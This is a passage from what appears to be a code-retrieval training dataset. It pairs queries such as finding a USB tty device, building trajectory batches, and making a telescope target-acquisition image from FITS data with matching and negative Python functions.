"def copy(self) -> \"SbProjector *\":\n return _coin.SbLineProjector_copy(self)",
"def hollow_copy(self):\n new_tirp = TIRP()\n new_tirp._symbols = copy(self._symbols)\n new_tirp._label=self._label\n new_tirp._name = self._name\n new_tirp._tirp_matrix = self._tirp_matrix.copy()\n\n return new_tirp",
"def copy(self, in_place: bool = False) -> list:\n new_ingredients = self.copy_ingredients()\n if in_place:\n self.ingredient_list = new_ingredients\n else:\n new_list = GroceryList(self.copy_ingredients())\n return new_list",
"def copy(self):\r\n return CellList([cell.copy() for cell in self])",
"def copy(self, parent):\n out = Block(self.type)\n out.pins = dict((k, v.copy(out)) for k, v in self.pins.items())\n out.mirrored = self.mirrored\n out.rotation = self.rotation\n\n out.name = self.name\n out.groups = self.groups\n\n out.size = self.size\n out.field = parent or self\n\n return out",
"def rewind(self,index):\n removed_instructions = []\n for instruction in reversed(self.protocol.instructions[index:]):\n for group in reversed(instruction[\"groups\"]):\n for transfer in group.get(\"transfer\",{}):\n fromLoc = transfer[\"from\"][\"locName\"]\n toLoc = transfer[\"to\"][\"locName\"]\n volume = transfer[\"volume\"]\n self.rev_transfer(fromLoc,toLoc,volume)\n removed_instructions.insert(0,self.protocol.instructions.pop())\n return removed_instructions",
"def iter_blocks(self):\n blocks = re.split(r'\\n{2,}', self.args.input.read())\n return (b for b in blocks if b)",
"def copy(self):\n\n cards = [None]*len(self)\n for i in range(len(self)):\n cards[i]=Card('').fromstring(str(self[i]))\n return CardList(cards)",
"def clone(orig: Model[InT, OutT], n: int) -> Model[InT, OutT]:\n if n == 0:\n return cast(Model[InT, OutT], noop())\n elif n == 1:\n return orig\n layers: List[Model] = [orig]\n for i in range(n - 1):\n layers.append(orig.copy())\n return cast(Model[InT, OutT], chain(*layers))",
"def condense_output_list(output_list, options):\r\n out_list = [['textBlock', ''], ]\r\n for blocks in output_list:\r\n for block in blocks:\r\n if block[0] == \"commentBlock\":\r\n block[0] = \"inputBlock\"\r\n if options.nocode and block[0] == \"inputBlock\":\r\n continue\r\n elif block[0] == out_list[-1][0]:\r\n out_list[-1][1] += block[1]\r\n if block[0] == 'outputBlock':\r\n out_list[-1][2] += block[2]\r\n out_list[-1][1] = re.sub(r\"(\\n)+\", r\"\\n\", out_list[-1][1])\r\n else:\r\n out_list += [block]\r\n return out_list",
"def state_copy(self):\n list1 = []\n list2 = []\n for x in self.state[0]:\n list1.append(x)\n for x in self.state[1]:\n list2.append(x)\n ret = []\n ret.append(list1)\n ret.append(list2)\n return ret",
"def copy(self):\n return _core.SwigPyIterator_copy(self)",
"def copy(self):\n\n rv = FileList()\n\n for i in self:\n rv.append(i.copy())\n\n return rv",
"def get_combinational_blocks( self ):\n return self._combinational_blocks",
"def copy_ingredients(self) -> list:\n new_ingredients = [Ingredient(ing) for ing in self.ingredient_list]\n return new_ingredients",
"def reviter(self):\n for b in self.blocks[::-1]:\n yield b",
"def optimize_blocks(self) -> Location:\n return self._combine_blocks(preserve_overlappers=True)._remove_empty_blocks()._to_single_interval_if_one_block()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Print MYHOMECMD version, build and date
|
def print_version():
logger.debug("print_version")
print "MYHOMECMD Version: " + __version__
print __date__.replace('$', '')
logger.debug("Exit 0")
sys.exit(0)
|
[
"def version(self):\n# import subprocess\n# p = subprocess.Popen('ecl --version', shell=True, stdin=subprocess.PIPE,\n# stdout = subprocess.PIPE, stderr=subprocess.PIPE)\n# return AsciiArtString(p.stdout.read())\n return \"Version information is given by lisp.console().\"",
"def print_tohu_version():\n print(f\"Tohu version: {get_versions()['version']}\")",
"def print_version():\n try:\n print('Build date: %s (%#x)' % (build_date, hex_version()))\n print('LibVLC version: %s (%#x)' % (bytes_to_str(libvlc_get_version()), libvlc_hex_version()))\n print('LibVLC compiler: %s' % bytes_to_str(libvlc_get_compiler()))\n if plugin_path:\n print('Plugin path: %s' % plugin_path)\n except:\n print('Error: %s' % sys.exc_info()[1])",
"def version():\n click.echo(\"adafruit-nrfutil version {}\".format(nrfutil_version.NRFUTIL_VERSION))",
"def conky_build_date(self):\n self.writeCommand('conky_build_date')\n return self",
"def get_system_version_info() -> str:\n output_template = '{:<12} {}'\n line_separator = '-' * 60\n not_found_str = '[Not Found]'\n out_lines = []\n\n # System (Python, OS)\n out_lines += ['System Version Info', line_separator]\n out_lines += [\n output_template.format(name, version) for name, version in (\n ('OS', '%s' % platform.platform()),\n ('Python', '%d.%d.%d' % sys.version_info[0:3]),\n )\n ]\n\n # Third-Party Packages\n out_lines += ['', 'Package Version Info', line_separator]\n backend_modules = (\n 'appdirs',\n 'av',\n 'click',\n 'cv2',\n 'moviepy',\n 'numpy',\n 'tqdm',\n )\n for module_name in backend_modules:\n try:\n module = importlib.import_module(module_name)\n out_lines.append(output_template.format(module_name, module.__version__))\n except ModuleNotFoundError:\n out_lines.append(output_template.format(module_name, not_found_str))\n\n # External Tools\n out_lines += ['', 'Tool Version Info', line_separator]\n\n tool_version_info = (\n ('ffmpeg', get_ffmpeg_version()),\n ('mkvmerge', get_mkvmerge_version()),\n )\n\n for (tool_name, tool_version) in tool_version_info:\n out_lines.append(\n output_template.format(tool_name, tool_version if tool_version else not_found_str))\n\n return '\\n'.join(out_lines)",
"def show_version(gcdroot, userhome, options):\n if len(options.args) > 0:\n return show_error(\n \"Unexpected arguments for %s: (%s)\"%(options.command, \" \".join(options.args)), \n GCD_UNEXPECTEDARGS\n )\n status = GCD_SUCCESS\n print(GCD_VERSION)\n # with open(logfilename, \"r\") as logfile:\n # shutil.copyfileobj(logfile, sys.stdout)\n return status",
"def show_version():\n return _run_speedify_cmd([\"version\"])",
"def show_version():\n print('{name} version {ver}\\n'.format(name=PROGNAME, ver=VERSION))\n sys.exit(0)",
"def version(args):\n print(f\"Cli - Version : {Helpers.cli_version()}\")",
"def version():\n print(\"gcdt version %s\" % __version__)",
"def version(self, **kwds):\n # print the version number\n print(f\"{{{project.name}.meta.version}}\")\n # all done\n return 0",
"def do_version(self, _args) -> None:\n ret = self.remote_exec(\"print(uos.uname().release)\")\n version = ret.decode(\"utf-8\")\n print(f\"Micropython version {version}\")",
"def print_platform():\n \n string = (\"PYTHON VERSION: {} \\nPLATFORM: {} \\nPROCESSOR: {}\"\n + \"\\nVERSION: {} \\nMAC VERSION: {}\")\n print(string.format(sys.version, platform.platform(),\n platform.uname()[5], platform.version()[:60]\n + '\\n' + platform.version()[60:], platform.mac_ver()))",
"def version():\n print('Version {}'.format(ekscli.__version__))",
"def version():\n print(\"Code writen for Python3.6.4. Using: %s\"%platform.python_version())",
"def build_info(self):\n \n path='/build_info'\n res = self.client.call(path, 'GET', data='', token=self.manager.identity.token)\n self.logger.debug('Openstack build info: %s' % \\\n truncate(res))\n return res[0]",
"def get_current_pkg_version():\n current_major_minor = _find_in_file(os.path.join(here, PKG_NAME, '__init__.py'))\n last_jenkins_build_num = get_next_jenkins_build()\n\n full_version = f'{current_major_minor}.{last_jenkins_build_num}'\n\n return full_version",
"def version():\n print('Lizzy Client', VERSION)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
find_tty_usb('10c4', 'ea60') > '/dev/ttyACM0'
|
def find_tty_usb(idVendor, idProduct):
# trouver l'idVendor et l'idProduct grace a lsusb -v
# Note: if searching for a lot of pairs, it would be much faster to search
# for the enitre lot at once instead of going over all the usb devices
# each time.
for dnbase in os.listdir('/sys/bus/usb/devices'):
dn = join('/sys/bus/usb/devices', dnbase)
if not os.path.exists(join(dn, 'idVendor')):
continue
idv = open(join(dn, 'idVendor')).read().strip()
if idv != idVendor:
continue
idp = open(join(dn, 'idProduct')).read().strip()
if idp != idProduct:
continue
for subdir in os.listdir(dn):
if subdir.startswith(dnbase+':'):
for subsubdir in os.listdir(join(dn, subdir)):
if subsubdir.startswith('ttyUSB'):
return join('/dev', subsubdir)
|
[
"def connect():\n for (COMMS_CHANNEL, NAME, deviceId) in serial.tools.list_ports.comports():\n if re.match(r\"^\\s*USB VID:PID=0*2341:0*3e\\b\", deviceId, re.I):\n f = serial.Serial(COMMS_CHANNEL, 115200, timeout=60)\n return f\n raise RuntimeError(\"Could not locate arduino serial port connection. Arduino not plugged in? Or plugged into wrong serial port on the arduino?\")",
"def find_usb_serial_devices():\n devicelist=[]\n\n if \"posix\" in os.name:\n # first, look for ttyUSB devices, and filter those supported\n devices=sorted(glob.glob(\"/dev/ttyUSB*\"));\n for device in devices:\n devicelist.append((device,__identify_usb_serial_device(device)))\n # next, look for ttyACM devices, and accept unfiltered (mbed)\n devices=sorted(glob.glob(\"/dev/ttyACM*\"));\n for device in devices:\n devicelist.append((device,\"ttyacm\"))\n return devicelist",
"def connect_pump():\n x = serial.Serial(\"/dev/ttyUSB0\", baudrate=9600,\n bytesize=serial.EIGHTBITS,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n timeout=1)\n if x.isOpen():\n print \"Connected to Pump \\n\"\n return x",
"def __init__(self, device_id, serial_port = \"/dev/ttyAMA0\"): \n self.device_id = device_id\n self.serial_port = serial_port\n self.ser = serial.Serial(self.serial_port)",
"def connectToSerial(dev):\n\tinsteon.setPort(IOPort(SerialIOStream(dev)))",
"def get_port():\n port = 0\n if sys.platform.startswith('darwin'):\n port = glob.glob('/dev/tty.usbmodem*')[0]\n elif sys.platform.startswith('win'):\n ports = ['COM%s' % (i + 1) for i in range(32)]\n for p in ports:\n try:\n s = serial.Serial(p)\n s.close()\n port = p\n except (OSError, serial.SerialException):\n pass\n return port",
"def get_virtio_disk_serial(device_name):\n dev_path = ('/sys/block/%s/serial' % device_name)\n out, err, rc = run_command([CAT, dev_path], throw=False)\n if (rc != 0):\n return ''\n # our out list has one element that is the serial number, like\n # ['11111111111111111111']\n return out[0]",
"def connect_uc(serport):\n\n ser = None\n try:\n ser = serial.Serial(serport, baudrate=115200, timeout=1)\n except Exception as msg:\n logging.critical(msg)\n exit(255)\n sleep(1)\n ser.flushInput()\n logging.info(\"connecting to uc over serial... \")\n i = randint(1,10000)\n try:\n ser.write('e {}\\n'.format(i))\n if int(ser.readline().split()[1]) == i:\n logging.info(\"connected to uc over serial.\")\n else:\n logging.critical(\"got unexpected response, can't start.\")\n exit(1)\n except IndexError:\n logging.critical(\"failed to connect, can't start.\")\n exit(1)\n return ser",
"def discover_arduinos():\n serial_ids = Popen(['ls', '/dev/serial/by-id'], stdout=PIPE, stderr=PIPE)\n\n paths = []\n\n if serial_ids.returncode:\n return paths\n\n for id in serial_ids.stdout:\n id = id.decode('utf8').strip()\n\n if re.search(r\"Arduino\", id):\n sym_link = Popen(['file', '/dev/serial/by-id/' + id], stdout=PIPE)\n\n for link in sym_link.stdout:\n out = re.search(r\"tty.*\", link.decode('utf8'))\n if out:\n paths.append(out.group(0))\n\n return paths",
"def open(address, timeout=5):\n return serial.Serial(address, baudrate=9600, timeout=timeout)",
"def serial_tx(string):\r\n Serial2.println(string)",
"def configure_com(port=None):\n try:\n print_serial_ports()\n if not port: i = input(\"## Port: \")\n else: i = port\n s = serial.Serial(i, 115200, timeout=SERIAL_TIMEOUT)\n print(\"Connection estabilished.\")\n except Exception as e:\n print(\"ERR! An error occured:\", e)\n return serial.Serial()\n\n signal = \"wait\"\n if not wait_for_signal(s, signal):\n print(\"ERR! Signal\", signal, \"not sent.\")\n return serial.Serial()\n return s",
"def get_com_port():\n ports = list(serial.tools.list_ports.comports())\n\n #Is list ports empty?\n if not ports:\n logging.critical(\"No Serial Ports found! Exiting now\")\n exit()\n\n #If there is only one port available, automatically use that one\n if len(ports) == 1:\n return ports[0].device\n\n #Display all available ports if there are more than one available\n print(\"Available Ports: \")\n for port in ports:\n print(port)\n return input(\"Enter Xbee Serialport: \")",
"def find_devices():\n dev_list = []\n for port in list_ports.comports():\n p = Serial()\n p.port = port.device\n p.timeout = 1\n try:\n p.open()\n except SerialException as e:\n icse0xxa_eprint(\"find_devices(): {}\".format(e))\n continue\n try:\n time.sleep(0.5)\n p.write(ICSE0XXADevice.ID_COMMAND)\n time.sleep(0.5)\n answer = p.read(1)\n if (len(answer) > 0) and (answer[0] in ICSE0XXADevice.MODELS):\n dev_list.append(ICSE0XXADevice(p.port, answer[0]))\n except SerialTimeoutException as e:\n icse0xxa_eprint(\"find_devices(): {}\".format(e))\n finally:\n p.close()\n return dev_list",
"def test_com_port(port=[]):\n # print(\"Testing\", port)\n s = serial.Serial(port, 115200, timeout=2)\n s.write(bytes([1]))\n s.write(bytes([13]))\n #n = 0\n #while n == 0:\n #n = s.inWaiting()\n try:\n m = ord(s.read())\n if m == 186:\n s.close()\n return 1\n if m == 174:\n s.close()\n return 2\n s.close()\n return 0\n except:\n return 0",
"def scan():\n if is_windows:\n # scan for available ports. return a list of tuples (num, name)\n available = []\n for i in range(256):\n try:\n s = serial.Serial(i)\n available.append( (i, s.portstr))\n s.close()\n except serial.SerialException:\n pass\n return available\n else:\n return glob.glob('/dev/ttyS*') + glob.glob('/dev/ttyUSB*')",
"def _find(self):\n ports = [port\n for port\n in serial.tools.list_ports.comports()\n if port.device != '/dev/ttyAMA0']\n\n for port in ports:\n try:\n conn = serial.Serial(\n port.device,\n self._baud,\n timeout=DETECT_TIMEOUT\n )\n if Serial._knock(conn):\n conn.close()\n return conn.port\n except:\n continue",
"def get_port(args, default_filename=\"conf/uart_path.txt\"):\n if args.COM != None:\n port = \"COM\" + str(args.COM)\n elif args.ttyUSB != None:\n port = \"/dev/ttyUSB\" + str(args.ttyUSB)\n elif args.ttyS != None:\n port = \"/dev/ttyS\" + str(args.ttyS)\n else:\n port = read_dev_path(default_filename)\n\n return port",
"def find_address(device = None, timeout = 0.1):\n rm = visa.ResourceManager()\n resources = rm.list_resources()\n for name in resources:\n \n if name.find('ASRL') > -1:\n read_termination = '\\r'\n else:\n read_termination = None #use default for GPIB\n try:\n instr = rm.open_resource(name, timeout = 1000*timeout, read_termination = read_termination)#it can fail to open if port already opend)\n out = instr.ask('*IDN?').strip('*IDN?')#sometimes commands are echoed back.. remove this echo\n ok = True\n except:\n out = ''\n ok = False\n if out != '' and ok:\n if device is not None:\n if out.find(device) != -1:\n instr.close()\n return name\n else:\n for dev in DEVICES:\n if out.find(dev) != -1:\n instr.close()\n return name\n if ok:\n instr.close()\n return ''"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Construct a batch from a list of trajectories and their information.
|
def construct_batch(
self,
trajs: List[Dict[str, List[Tuple[Graph, GraphAction]]]],
cond_info: float,
rewards: float,
) -> gd.Batch:
torch_graphs = [
self.ctx.graph_to_data(i[0]) for tj in trajs for i in tj["traj"]
]
actions = [
self.ctx.graph_action_to_aidx(g, a)
for g, a in zip(torch_graphs, [i[1] for tj in trajs for i in tj["traj"]])
]
num_backward = torch.tensor(
[
# Count the number of backward transitions from s_{t+1},
# unless t+1 = T is the last time step
self.env.count_backward_transitions(tj["traj"][i + 1][0])
if i + 1 < len(tj["traj"])
else 1
for tj in trajs
for i in range(len(tj["traj"]))
]
)
batch = self.ctx.collate(torch_graphs)
batch.traj_lens = torch.tensor([len(i["traj"]) for i in trajs])
batch.num_backward = num_backward
batch.actions = torch.tensor(actions)
batch.rewards = rewards
batch.cond_info = cond_info
batch.is_valid = torch.tensor([i.get("is_valid", True) for i in trajs]).float()
return batch
|
[
"def split(self):\n trajectories = []\n start = 0\n for i, length in enumerate(self.lengths):\n stop = start + length\n traj = TrajectoryBatch(\n env_spec=self.env_spec,\n observations=self.observations[start:stop],\n last_observations=numpy.asarray([self.last_observations[i]]),\n actions=self.actions[start:stop],\n rewards=self.rewards[start:stop],\n terminals=self.terminals[start:stop],\n env_infos=tensor_utils.slice_nested_dict(self.env_infos, start, stop),\n agent_infos=tensor_utils.slice_nested_dict(\n self.agent_infos, start, stop\n ),\n lengths=numpy.asarray([length]),\n )\n trajectories.append(traj)\n start = stop\n return trajectories",
"def _batch_io(traj_io: Trajectories) -> Trajectory:\n\n assert traj_io # non-empty\n for sample_io in traj_io:\n for dp in sample_io:\n assert dp.data.shape[0] == 1 # batching axis\n\n batched_traj = traj_io[0] # construct batched trajectory in-place\n for cur_sample in traj_io[1:]:\n for i in range(len(batched_traj)):\n # Validate that each trajectory contains the same probes.\n assert batched_traj[i].name == cur_sample[i].name\n\n # Concatenate each probe along the trajectory/time axis.\n batched_traj[i] = probing.DataPoint(\n name=batched_traj[i].name,\n location=batched_traj[i].location,\n type_=batched_traj[i].type_,\n data=np.concatenate([batched_traj[i].data, cur_sample[i].data],\n axis=0))\n\n return batched_traj",
"def make_batch(l):\n if isinstance(l[0], int):\n return torch.LongTensor(l)\n if isinstance(l[0], float):\n return torch.FloatTensor(l)\n if isinstance(l[0], torch.Tensor):\n return torch.stack(l)\n raise ValueError(\"unknown batch type: {}\".format(type(l[0])))",
"def create_dataset(sublist):\n content = [dict_to_sparse_tensor(x) for x in sublist]\n dataset = tf.sparse_concat(axis=0, sp_inputs=content)\n dataset = tf.data.Dataset.from_tensor_slices((dataset))\n return dataset",
"def construct_batch(self, indices):\r\n # leave to exact case\r\n raise NotImplementedError",
"def concat_across_batch_dim(cls, trajs):\n if len(trajs) == 0:\n return None\n\n position_nk2 = np.concatenate([traj.position_nk2()\n for traj in trajs], axis=0)\n speed_nk1 = np.concatenate([traj.speed_nk1()\n for traj in trajs], axis=0)\n acceleration_nk1 = np.concatenate(\n [traj.acceleration_nk1() for traj in trajs], axis=0)\n heading_nk1 = np.concatenate(\n [traj.heading_nk1() for traj in trajs], axis=0)\n angular_speed_nk1 = np.concatenate(\n [traj.angular_speed_nk1() for traj in trajs], axis=0)\n angular_acceleration_nk1 = np.concatenate(\n [traj.angular_acceleration_nk1() for traj in trajs], axis=0)\n valid_horizons_n1 = np.concatenate(\n [traj.valid_horizons_n1 for traj in trajs], axis=0)\n\n dt = trajs[0].dt\n k = trajs[0].k\n n = position_nk2.shape[0]\n return cls(dt=dt, n=n, k=k, position_nk2=position_nk2,\n speed_nk1=speed_nk1, acceleration_nk1=acceleration_nk1,\n heading_nk1=heading_nk1, angular_speed_nk1=angular_speed_nk1,\n angular_acceleration_nk1=angular_acceleration_nk1,\n valid_horizons_n1=valid_horizons_n1)",
"def construct_batch(self, indices):\r\n # allocate batch memory\r\n input_birth_rate = []\r\n target_cnt_trans = []\r\n target_cnt_states = []\r\n target_P = []\r\n target_pi = []\r\n\r\n # traverse all indices\r\n for idx in indices:\r\n birth_rate, cnt_trans, cnt_states, P, pi = self.samples[idx]\r\n input_birth_rate.append(birth_rate)\r\n target_cnt_trans.append(cnt_trans)\r\n target_cnt_states.append(cnt_states)\r\n target_P.append(P)\r\n target_pi.append(pi)\r\n\r\n # transform data into valid tensors\r\n input_birth_rate = torch.LongTensor(input_birth_rate).type(self.tensor).to(self.device)\r\n target_cnt_trans = torch.stack(target_cnt_trans).type(self.tensor).to(self.device)\r\n target_cnt_states = torch.stack(target_cnt_states).type(self.tensor).to(self.device)\r\n target_P = torch.stack(target_P).type(self.tensor).to(self.device)\r\n target_pi = torch.stack(target_pi).type(self.tensor).to(self.device)\r\n return input_birth_rate, ((target_cnt_trans, target_cnt_states), (target_P, target_pi))",
"def _create_mini_batch(self, subsongs):\n # Get matrix with shape [num_instances, time_steps, num_features]\n input_matrix = np.asarray([input_tensor for input_tensor, target_tensor in subsongs])\n target_matrix = np.asarray([target_tensor for input_tensor, target_tensor in subsongs])\n \n # Divide them into list of MiniBatch \n num_mini_batch = int(math.ceil(len(input_matrix) / self.args.train_mini_batch_size))\n mini_batches = []\n for batch_i in range(num_mini_batch):\n mini_batch = DatasetPreparor.MiniBatch()\n start_i = batch_i * self.args.train_mini_batch_size\n end_i = (batch_i + 1) * self.args.train_mini_batch_size\n if end_i > len(input_matrix):\n end_i = len(input_matrix)\n mini_batch.inputs = input_matrix[start_i:end_i]\n mini_batch.targets = target_matrix[start_i:end_i]\n mini_batches.append(mini_batch)\n return mini_batches",
"def create_batch(cls, size, **kwargs):\n return [cls.create(**kwargs) for _ in range(size)]",
"def gather_across_batch_dim_and_create(cls, traj, idxs):\n dt = traj.dt\n n = idxs.size\n k = traj.k\n\n def gather(arr, idxs): # used for when arr is multidim and dont want slicing\n return arr[idxs]\n\n position_nk2 = gather(traj.position_nk2(), idxs)\n speed_nk1 = gather(traj.speed_nk1(), idxs)\n acceleration_nk1 = np.zeros_like(traj.acceleration_nk1()) if traj.acceleration_nk1().size == 0 else gather(\n traj.acceleration_nk1(), idxs)\n heading_nk1 = gather(traj.heading_nk1(), idxs)\n angular_speed_nk1 = gather(traj.angular_speed_nk1(), idxs)\n angular_acceleration_nk1 = np.zeros_like(traj.angular_acceleration_nk1()) if traj.angular_acceleration_nk1(\n ).size == 0 else gather(traj.angular_acceleration_nk1(), idxs)\n valid_horizons_n1 = gather(traj.valid_horizons_n1, idxs)\n return cls(dt=dt, n=n, k=k, position_nk2=position_nk2,\n speed_nk1=speed_nk1, acceleration_nk1=acceleration_nk1,\n heading_nk1=heading_nk1, angular_speed_nk1=angular_speed_nk1,\n angular_acceleration_nk1=angular_acceleration_nk1,\n valid_horizons_n1=valid_horizons_n1)",
"def batch_trajectory_to_single_trajectory(trajectory):\n batch_shape = trajectory[0].state.shape[:-1]\n out = []\n for batch_obs in trajectory:\n expanded_obs = Observation(\n *[k.repeat(batch_shape) if k.dim() < 1 else k for k in batch_obs]\n )\n squeezed_obs = Observation(\n *[k.reshape(-1, *k.shape[len(batch_shape) :]) for k in expanded_obs]\n )\n out += [Observation(*k) for k in zip(*squeezed_obs)]\n\n return out",
"def batch(list_to_batch, batch_size=BATCH_SIZE):\n for i in range(0, len(list_to_batch), batch_size):\n yield tuple(list_to_batch[i:i + batch_size])",
"def sample_trajectories_batch(model, context, device, cfg):\n n_samples = cfg['extractor_cfg']['n_samples']\n n_time_steps = cfg['model_params']['future_num_frames']\n bs = context.shape[0]\n samples = torch.zeros((bs, 1, n_samples, 2 * n_time_steps))\n for i in range(n_samples):\n z = torch.randn(bs, cfg['cvae_cfg']['latent_dim']).to(device)\n with torch.no_grad():\n trajectories = model.inference(z, context)\n samples[:, 0, i, :] = trajectories\n return samples",
"def batchify(batch):\n\n \"\"\"Gather a batch of individual examples into one batch.\"\"\"\n NUM_INPUTS = 3\n NUM_TARGETS = 2\n NUM_EXTRA = 1\n\n ids = [ex[-1] for ex in batch]\n docs = [ex[0] for ex in batch]\n features = [ex[1] for ex in batch]\n questions = [ex[2] for ex in batch]\n\n # Batch documents and features\n max_length = max([d.size(0) for d in docs])\n docs_indices = torch.LongTensor(len(docs), max_length).zero_()\n docs_mask = torch.ByteTensor(len(docs), max_length).fill_(1)\n if features[0] is None:\n docs_feature = None\n else:\n docs_feature = torch.zeros(len(docs), max_length, features[0].size(1))\n for i, d in enumerate(docs):\n docs_indices[i, :d.size(0)].copy_(d)\n docs_mask[i, :d.size(0)].fill_(0)\n if docs_feature is not None:\n docs_feature[i, :d.size(0)].copy_(features[i])\n\n # Batch questions\n max_length = max([q.size(0) for q in questions])\n questions_indices = torch.LongTensor(len(questions), max_length).zero_()\n questions_mask = torch.ByteTensor(len(questions), max_length).fill_(1)\n for i, q in enumerate(questions):\n questions_indices[i, :q.size(0)].copy_(q)\n questions_mask[i, :q.size(0)].fill_(0)\n\n # Maybe return without targets\n if len(batch[0]) == NUM_INPUTS + NUM_EXTRA:\n return docs_indices, docs_feature, docs_mask, questions_indices, questions_mask, ids\n\n elif len(batch[0]) == NUM_INPUTS + NUM_EXTRA + NUM_TARGETS:\n # ...Otherwise add targets\n if torch.is_tensor(batch[0][3]):\n start = torch.cat([ex[3] for ex in batch])\n end = torch.cat([ex[4] for ex in batch])\n else:\n start = [ex[3] for ex in batch]\n end = [ex[4] for ex in batch]\n else:\n raise RuntimeError('Incorrect number of inputs per example.')\n\n return docs_indices, docs_feature, docs_mask, questions_indices, questions_mask, start, end, ids",
"def test_source_dataset_factory_build_batch(self):\n source_datasets = factories.SourceDatasetFactory.build_batch(10)\n for one in source_datasets:\n self.assertIsInstance(one, models.SourceDataset)",
"def generate_batch_song(list_all_midi, batch_music=16, start_index=0, fs=30, seq_len=50, use_tqdm=False):\n\n assert len(list_all_midi) >= batch_music\n dict_time_notes = generate_dict_time_notes(list_all_midi, batch_music, start_index, fs, use_tqdm=use_tqdm)\n\n list_musics = process_notes_in_song(dict_time_notes, seq_len)\n collected_list_input, collected_list_target = [], []\n\n for music in list_musics:\n list_training, list_target = generate_input_and_target(music, seq_len)\n collected_list_input += list_training\n collected_list_target += list_target\n return collected_list_input, collected_list_target",
"def _createBatch(self, samples):\n\n batch = Batch()\n batchSize = len(samples)\n\n sentence_num_max = 0\n # Create the batch tensor\n for i in range(batchSize):\n # Unpack the sample\n context_tokens, q_tokens, option, word_start, word_end, option_raw, sentence_info, all_answer_text = samples[i]\n\n if len(context_tokens) > args['maxLengthEnco']:\n context_tokens = context_tokens[:args['maxLengthEnco']]\n\n batch.contextSeqs.append(context_tokens)\n batch.context_lens.append(len(batch.contextSeqs[i]))\n batch.questionSeqs.append(q_tokens)\n batch.question_lens.append(len(batch.questionSeqs[i]))\n batch.answerSeqs.append(option)\n batch.ans_lens.append(len(option))\n batch.raw_ans.append(option_raw)\n sentence_num_max = max(sentence_num_max, len(sentence_info))\n batch.starts.append(word_start)\n batch.ends.append(word_end)\n batch.all_answers.append(all_answer_text)\n # batch.core_sen_ids.append(core_sen_id)\n\n maxlen_con = max(batch.context_lens)\n maxlen_q = max(batch.question_lens)\n maxlen_opt = max(batch.ans_lens)\n # args['chargenum'] + 1 padding\n\n for i in range(batchSize):\n sentence_info = samples[i][6]\n batch.contextSeqs[i] = batch.contextSeqs[i] + [self.word2index['PAD']] * (\n maxlen_con - len(batch.contextSeqs[i]))\n batch.questionSeqs[i] = batch.questionSeqs[i] + [self.word2index['PAD']] * (\n maxlen_q - len(batch.questionSeqs[i]))\n\n batch.decoderSeqs.append([self.word2index['START_TOKEN']] + batch.answerSeqs[i] + [self.word2index['PAD']] * (\n maxlen_opt - len(batch.answerSeqs[i])))\n batch.targetSeqs.append(batch.answerSeqs[i] + [self.word2index['END_TOKEN']] + [self.word2index['PAD']] * (\n maxlen_opt - len(batch.answerSeqs[i])))\n batch.answerSeqs[i] = batch.answerSeqs[i] + [self.word2index['PAD']] * (\n maxlen_opt - len(batch.answerSeqs[i]))\n batch.sentence_mask.append(np.zeros([sentence_num_max, maxlen_con]))\n start = 0\n end = 0\n for ind, sen_l in enumerate(sentence_info):\n end += sen_l\n batch.sentence_mask[i][ind, start:end] = 1\n start = end\n batch.context_mask[i, :sen_l] = 1\n\n return batch",
"def tlist_to_flat(trajs):\n # Check all trajectories are same order tensors.\n traj_orders = np.array([len(np.shape(ti)) for ti in trajs])\n if np.any(traj_orders != traj_orders[0]):\n raise ValueError(\"Input Trajectories have varying dimension\")\n if traj_orders[0] == 1:\n trajs = [t_i.reshape(-1, 1) for t_i in trajs]\n # Get dimensions of traj object.\n d = len(trajs[0][0])\n # Populate the large trajectory.\n traj_2d = []\n traj_edges = [0]\n len_traj_2d = 0\n for i, traj in enumerate(trajs):\n # Check that trajectory is of right format.\n if len(np.shape(traj)) != 2:\n raise ValueError('Trajectory %d is not two dimensional!' % i)\n d2 = np.shape(traj)[1]\n if d2 != d:\n raise ValueError('Trajectories are of incompatible dimension. The first trajectory has dimension %d and trajectory %d has dimension %d' % (d, i, d2))\n traj_2d += list(traj)\n len_traj_2d += len(traj)\n traj_edges.append(len_traj_2d)\n return np.array(traj_2d), np.array(traj_edges)",
"def make_trajectory_dataset(data_files, state_dim, action_dim):\n data = (tf.data.Dataset.list_files(data_files)\n .interleave(tf.data.TFRecordDataset, 1)\n .map(TrajectoryDecoder(state_dim, action_dim)))\n\n return data"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Create the image on which to perform the centroiding given a fits file containing an exposure with multiple groups. In the case of multiple integrations in the exposure, use only the first, and produce a single TA image.
|
def make_ta_image(infile, ext=0, useframes=3, save=False, silent=False):
# Read in data. Convert to floats
with fits.open(infile) as h:
data = h[ext].data
head = h[ext].header
data = data * 1.
shape = data.shape
#pdb.set_trace()
if len(shape) <= 2:
raise RuntimeError(("Warning: Input target acq exposure must "
"have multiple groups!"))
elif len(shape) == 3:
# If there are only 3 dimensions, check the header keywords to identify ngroups, nints against the shape of the cube
# If there are multiple integrations, use only the first
if shape[0] == head['NGROUPS'] * head['NINT']:
data = data[:head['NGROUPS'], :, :]
shape = data.shape
else:
raise RuntimeError("Number of groups and integrations in header does not match data format")
elif len(shape) == 4:
# If there are multiple integrations, use only the first
data = data[0, :, :, :]
ngroups = shape[-3]
# don't report an error if data has an even number of groups, but do print a warning.
if ngroups % 2 == 0:
#raise RuntimeError(("Warning: Input target acq exposure "
# "must have an odd number of groups!"))
if not silent:
print('Warning: Input data has an even number of groups')
# First check whether an integer or a list were provided
# Group numbers to use. Adjust the values to account for
# python being 0-indexed
if type(useframes) is int:
if useframes == 3:
frames = [0, np.int((ngroups-1)/2), ngroups-1]
if not silent:
print('Data has {0} groups'.format(ngroups))
print('Using {0} for differencing'.format([frame+1 for frame in frames]))
scale = (frames[1] - frames[0]) / (frames[2] - frames[1])
#print('Scale = {0}'.format(scale))
diff21 = data[frames[1], :, :] - data[frames[0], :, :]
diff32 = scale * (data[frames[2], :, :] - data[frames[1], :, :])
ta_img = np.minimum(diff21, diff32)
else: #can now be arbitrary
#automatically determines which frames to use for arbitrary useFrames value
frames = np.round(np.linspace(0, ngroups-1, useframes)).astype(int)
if not silent:
